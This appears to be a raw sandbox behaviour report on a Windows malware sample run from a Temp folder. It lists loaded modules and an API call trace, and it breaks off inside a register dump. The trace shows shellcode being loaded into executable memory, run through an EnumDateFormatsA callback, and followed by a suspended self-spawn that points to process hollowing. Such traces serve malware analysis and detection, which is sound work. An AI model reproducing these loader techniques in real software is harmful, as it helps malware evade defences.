entry_point = 0x744f0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 393 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 394 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 395 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 396 start_va = 0x74db0000 end_va = 0x74e6dfff monitored = 0 entry_point = 0x74de5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 397 start_va = 0x4d0000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 398 start_va = 0x550000 end_va = 0x64ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 399 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 400 start_va = 0x75bf0000 end_va = 0x75dacfff monitored = 0 entry_point = 0x75cd2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 401 start_va = 0x759b0000 end_va = 0x75a5cfff monitored = 0 entry_point = 0x759c4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 402 start_va = 0x74560000 end_va = 0x7457dfff monitored = 0 entry_point = 0x7456b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 403 start_va = 0x74550000 end_va = 0x74559fff monitored = 0 entry_point = 0x74552a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 404 start_va = 0x777d0000 end_va = 0x77827fff monitored = 0 entry_point = 0x778125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 405 start_va = 0x757e0000 end_va = 0x75823fff monitored = 0 entry_point = 0x757f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 406 start_va = 0x771b0000 end_va = 0x772fefff monitored = 0 entry_point = 0x77266820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 407 start_va = 0x75640000 end_va = 0x75786fff monitored = 0 entry_point = 0x75651cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 408 start_va = 0x74700000 end_va = 0x747f1fff monitored = 0 entry_point = 0x74738070 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 409 start_va = 0x6e410000 end_va = 0x6e417fff monitored = 0 entry_point = 0x6e411740 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 410 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 411 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 412 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 413 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 414 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 415 start_va = 0x74810000 end_va = 0x7488afff monitored = 0 entry_point = 0x7482e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 416 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 417 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 418 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 419 start_va = 0x776d0000 end_va = 0x7772dfff monitored = 0 entry_point = 0x776e7470 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\SysWOW64\\FirewallAPI.dll" (normalized: "c:\\windows\\syswow64\\firewallapi.dll") Region: id = 420 start_va = 0x650000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 421 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 422 start_va = 0x6fa70000 end_va = 0x6fc7cfff monitored = 0 entry_point = 0x6fb5acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 423 start_va = 0x74d00000 end_va = 0x74d12fff monitored = 0 entry_point = 0x74d01d20 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 424 start_va = 0x6ea30000 end_va = 0x6eac1fff monitored = 0 entry_point = 0x6ea3dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 425 start_va = 0x6e3f0000 end_va = 0x6e40efff monitored = 0 entry_point = 0x6e3f9820 region_type = mapped_file name = "loadperf.dll" filename = "\\Windows\\SysWOW64\\loadperf.dll" (normalized: "c:\\windows\\syswow64\\loadperf.dll") Region: id = 426 start_va = 0x6e3a0000 end_va = 0x6e3e0fff monitored = 0 entry_point = 0x6e3ae050 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\SysWOW64\\resutils.dll" (normalized: "c:\\windows\\syswow64\\resutils.dll") Region: id = 427 start_va = 0x711d0000 end_va = 0x711dafff monitored = 0 entry_point = 0x711d1d20 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 428 start_va = 0x74200000 end_va = 0x7421afff monitored = 0 entry_point = 0x74209050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 429 start_va = 0x6f920000 end_va = 0x6f96efff monitored = 0 entry_point = 0x6f92d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 430 start_va = 0x6e320000 end_va = 0x6e39bfff monitored = 0 entry_point = 0x6e3428b0 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\SysWOW64\\clusapi.dll" (normalized: "c:\\windows\\syswow64\\clusapi.dll") Region: id = 431 start_va = 0x690000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 432 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 433 start_va = 0x6e300000 end_va = 0x6e31ffff monitored = 0 entry_point = 0x6e30d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 434 start_va = 0x6e2d0000 end_va = 0x6e2fbfff monitored = 0 entry_point = 0x6e2ebb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 435 start_va = 0x9d0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 436 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 437 start_va = 0xae0000 end_va = 0xc67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 438 start_va = 0x77740000 end_va = 0x7776afff monitored = 0 entry_point = 0x77745680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 439 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 440 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 441 start_va = 0xc70000 end_va = 0xdf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c70000" filename = "" Region: id = 442 start_va = 0xe00000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 443 start_va = 0x9d0000 end_va = 0xa7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 444 start_va = 0xad0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 445 start_va = 0x72360000 end_va = 0x7238bfff monitored = 0 entry_point = 0x72375ee0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\SysWOW64\\fwbase.dll" (normalized: "c:\\windows\\syswow64\\fwbase.dll") Region: id = 446 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 447 start_va = 0x510000 end_va = 0x529fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 464 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 465 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 467 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 468 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 469 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 470 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 471 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 472 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 473 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 474 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 475 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 476 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 477 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 478 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 479 start_va = 0x2200000 end_va = 0x2378fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 480 start_va = 0x2380000 end_va = 0x24fafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Thread: id = 6 os_tid = 0x630 [0308.811] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" [0308.812] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", pNumArgs=0x19ff7c | out: pNumArgs=0x19ff7c) returned 0x6dfff8*="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" [0308.814] _wfopen (_FileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\efnvpl"), _Mode="rb") returned 0x74e61268 [0308.815] VirtualAlloc (lpAddress=0x0, dwSize=0x1347, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0308.815] fread (in: _DstBuf=0x1e0000, _ElementSize=0x1347, _Count=0x1, _File=0x74e61268 | out: _DstBuf=0x1e0000*, _File=0x74e61268) returned 0x1 [0308.818] EnumDateFormatsA (lpDateFmtEnumProc=0x1e0000, Locale=0x0, dwFlags=0x0) [0308.821] LoadLibraryW (lpLibFileName="Shlwapi.dll") returned 0x77680000 [0308.821] GetTempPathW (in: nBufferLength=0x103, lpBuffer=0x19f950 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0308.821] PathAppendW (in: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", pMore="ptq0vlz6htg" | out: pszPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptq0vlz6htg") returned 1 [0308.822] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\ptq0vlz6htg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ptq0vlz6htg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0308.822] GetFileSize (in: hFile=0x1dc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19fff [0308.822] VirtualAlloc (lpAddress=0x0, dwSize=0x19fff, flAllocationType=0x3000, flProtect=0x4) returned 0x510000 [0308.822] ReadFile (in: hFile=0x1dc, lpBuffer=0x510000, nNumberOfBytesToRead=0x19fff, lpNumberOfBytesRead=0x19fd60, lpOverlapped=0x0 | out: lpBuffer=0x510000*, lpNumberOfBytesRead=0x19fd60*=0x19fff, lpOverlapped=0x0) returned 1 [0308.826] CloseHandle (hObject=0x1dc) returned 1 [0308.838] LoadLibraryW (lpLibFileName="ntdll.dll") returned 0x77830000 [0308.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f454, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe")) returned 0x32 [0308.839] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19ecd0, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\dehbibhar.exe")) returned 0x32 [0308.839] GetCommandLineW () returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl" [0308.839] CreateProcessW (in: lpApplicationName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe", lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f3ac*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f410 | out: lpCommandLine="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\dehbibhar.exe C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\efnvpl", lpProcessInformation=0x19f410*(hProcess=0x1e0, hThread=0x1dc, dwProcessId=0xb8c, dwThreadId=0xbd4)) returned 1 [0308.918] GetThreadContext (in: hThread=0x1dc, lpContext=0x19f0e0 | out: lpContext=0x19f0e0*(ContextFlags=0x10007, Dr0=0x723764b0, Dr1=0x8267b6f6, Dr2=0xfffffffe, Dr3=0x0, Dr6=0x6e6430, Dr7=0x77868828, FloatSave.ControlWord=0x1, FloatSave.StatusWord=0x3000003, FloatSave.TagWord=0x6e3320, FloatSave.ErrorOffset=0x72375ee0, FloatSave.ErrorSelector=0x72360000, FloatSave.DataOffset=0xb70002b5, FloatSave.DataSelector=0x7786aaae, FloatSave.RegisterArea=([0]=0xe0, [1]=0x5e, [2]=0x37, [3]=0x72, [4]=0x0, [5]=0x0, [6]=0x36, [7]=0x72, [8]=0x1, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xcc, [13]=0xaa, [14]=0x86, [15]=0x77, [16]=0x6e, [17]=0x5d, [18]=0x5d, [19]=0x21, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x25, [29]=0x2, [30]=0x0, [31]=0xc0, [32]=0x0, [33]=0x0, [34]=0x6d, [35]=0x0, [36]=0xd0, [37]=0xb9, [38]=0x6e, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x36, [43]=0x72, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x1, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0xd0, [53]=0x7, [54]=0x2, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x2, [59]=0x0, [60]=0x1, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x90, [69]=0xa5, [70]=0x6d, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x60, [77]=0x21, [78]=0x6d, [79]=0x0), FloatSave.Cr0NpxState=0xf46857d4, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x234000, Edx=0x0, Ecx=0x0, Eax=0x401000, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25, [5]=0x2, [6]=0x0, [7]=0xc0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xd0, [13]=0xf1, [14]=0x19, [15]=0x0, [16]=0x2b, [17]=0xba, [18]=0x86, [19]=0x77, [20]=0x58, [21]=0xf2, [22]=0x19, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x9, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x20, [37]=0xf2, [38]=0x19, [39]=0x0, [40]=0x33, [41]=0xb8, [42]=0x86, [43]=0x77, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x59, [49]=0xb8, [50]=0x86, [51]=0x77, [52]=0x2e, [53]=0x5e, [54]=0x5d, [55]=0x21, [56]=0x98, [57]=0xf3, [58]=0x19, [59]=0x0, [60]=0x28, [61]=0xf4, [62]=0x19, [63]=0x0, [64]=0x90, [65]=0xf3, [66]=0x19, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x1c, [73]=0xf2, [74]=0x19, [75]=0x0, [76]=0x58, [77]=0xf2, [78]=0x19, [79]=0x0, [80]=0x98, [81]=0xf3, [82]=0x19, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x18, [89]=0x48, [90]=0x6e, [91]=0x0, [92]=0xe0, [93]=0xf1, [94]=0x19, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0xcc, [101]=0xff, [102]=0x19, [103]=0x0, [104]=0x30, [105]=0xee, [106]=0x8a, [107]=0x77, [108]=0x26, [109]=0x8d, [110]=0xd6, [111]=0x56, [112]=0xfe, [113]=0xff, [114]=0xff, [115]=0xff, [116]=0x59, [117]=0xb8, [118]=0x86, [119]=0x77, [120]=0x9e, [121]=0x1, [122]=0x87, [123]=0x77, [124]=0x20, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x4, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x90, [141]=0xf3, [142]=0x19, [143]=0x0, [144]=0x54, [145]=0xf2, [146]=0x19, [147]=0x0, [148]=0x1, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x28, [153]=0xf4, [154]=0x19, [155]=0x0, [156]=0xc0, [157]=0x1, [158]=0x87, [159]=0x77, [160]=0xa, [161]=0x5e, [162]=0x5d, [163]=0x21, [164]=0x20, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x12, [173]=0x0, [174]=0x0, [175]=0x1, [176]=0x60, [177]=0xf2, [178]=0x19, [179]=0x0, [180]=0x6e, [181]=0x0, [182]=0x74, [183]=0x0, [184]=0x64, [185]=0x0, [186]=0x6c, [187]=0x0, [188]=0x6c, [189]=0x0, [190]=0x2e, [191]=0x0, [192]=0x64, [193]=0x0, [194]=0x6c, [195]=0x0, [196]=0x6c, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa3, [205]=0x97, [206]=0x86, [207]=0x77, [208]=0xa6, [209]=0xad, [210]=0x8b, [211]=0x77, [212]=0x40, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x6c, [277]=0xf3, [278]=0x19, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x18, [287]=0x0, [288]=0xa4, [289]=0xfd, [290]=0x19, [291]=0x0, [292]=0xd4, [293]=0xf2, [294]=0x19, [295]=0x0, [296]=0x68, [297]=0xf3, [298]=0x19, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x73, [305]=0x0, [306]=0x65, [307]=0x0, [308]=0x2e, [309]=0x0, [310]=0x64, [311]=0x0, [312]=0x6c, [313]=0x0, [314]=0x6c, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x6e, [319]=0x0, [320]=0x70, [321]=0xf5, [322]=0x19, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x2, [327]=0x0, [328]=0x8, [329]=0xf3, [330]=0x19, [331]=0x0, [332]=0x8, [333]=0xf3, [334]=0x19, [335]=0x0, [336]=0x8, [337]=0xf3, [338]=0x19, [339]=0x0, [340]=0x2, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x2, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x1a, [353]=0x5f, [354]=0x5d, [355]=0x21, [356]=0x8c, [357]=0xf4, [358]=0x19, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0xb5, [365]=0x93, [366]=0x86, [367]=0x77, [368]=0xb4, [369]=0xf3, [370]=0x19, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x2c, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x28, [381]=0xf9, [382]=0x19, [383]=0x0, [384]=0xa4, [385]=0xfd, [386]=0x19, [387]=0x0, [388]=0x30, [389]=0x94, [390]=0x86, [391]=0x77, [392]=0xa0, [393]=0xf5, [394]=0x19, [395]=0x0, [396]=0x20, [397]=0x0, [398]=0x0, [399]=0x1, [400]=0x16, [401]=0x0, [402]=0x18, [403]=0x0, [404]=0xa4, [405]=0xfd, [406]=0x19, [407]=0x0, [408]=0x48, [409]=0xf3, [410]=0x19, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x74, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0xec, [425]=0xf8, [426]=0x19, [427]=0x0, [428]=0x9c, [429]=0xb7, [430]=0x86, [431]=0x77, [432]=0x98, [433]=0xf3, [434]=0x19, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x42, [441]=0x5e, [442]=0x5d, [443]=0x21, [444]=0x1, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0xf0, [449]=0xf3, [450]=0x19, [451]=0x0, [452]=0x1, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0xcd, [465]=0x35, [466]=0x87, [467]=0x77, [468]=0x68, [469]=0xbc, [470]=0x6e, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x9, [477]=0x36, [478]=0x87, [479]=0x77, [480]=0x1a, [481]=0x0, [482]=0x0, [483]=0x1a, [484]=0x60, [485]=0x21, [486]=0x6d, [487]=0x0, 